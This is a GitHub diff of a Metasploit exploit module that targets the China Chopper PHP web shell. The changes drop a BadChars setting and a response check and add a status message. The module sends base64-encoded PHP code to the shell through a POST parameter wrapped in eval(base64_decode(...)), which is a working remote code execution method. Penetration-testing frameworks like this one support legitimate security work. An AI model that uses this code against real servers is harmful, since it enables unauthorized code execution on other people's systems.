File tree Expand file tree Collapse file tree 1 file changed +2
-9
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +2
-9
lines changed Original file line number Diff line number Diff line change @@ -24,10 +24,6 @@ def initialize(info = {})
24
24
[ 'URL' , 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html' ] ,
25
25
[ 'URL' , 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html' ]
26
26
] ,
27
- 'Payload' =>
28
- {
29
- 'BadChars' => '\x00'
30
- } ,
31
27
'Platform' => [ 'php' ] ,
32
28
'Arch' => ARCH_PHP ,
33
29
'Targets' =>
@@ -47,17 +43,13 @@ def initialize(info = {})
47
43
48
44
def http_send_command ( code )
49
45
code = "eval(base64_decode(\" #{ Rex ::Text . encode_base64 ( code ) } \" ));"
50
- res = send_request_cgi ( {
46
+ send_request_cgi ( {
51
47
'method' => 'POST' ,
52
48
'uri' => normalize_uri ( target_uri . path ) ,
53
49
'vars_post' => {
54
50
"#{ datastore [ 'PASSWORD' ] } " => code
55
51
}
56
52
} )
57
- unless res && res . code == 200
58
- fail_with ( Failure ::Unknown , 'Failed to execute the code.' )
59
- end
60
- res
61
53
end
62
54
63
55
def check
@@ -71,6 +63,7 @@ def check
71
63
end
72
64
73
65
def exploit
66
+ print_status ( "#{ peer } - Sending exploit..." )
74
67
http_send_command ( payload . raw )
75
68
end
76
69
end
You can’t perform that action at this time.
0 commit comments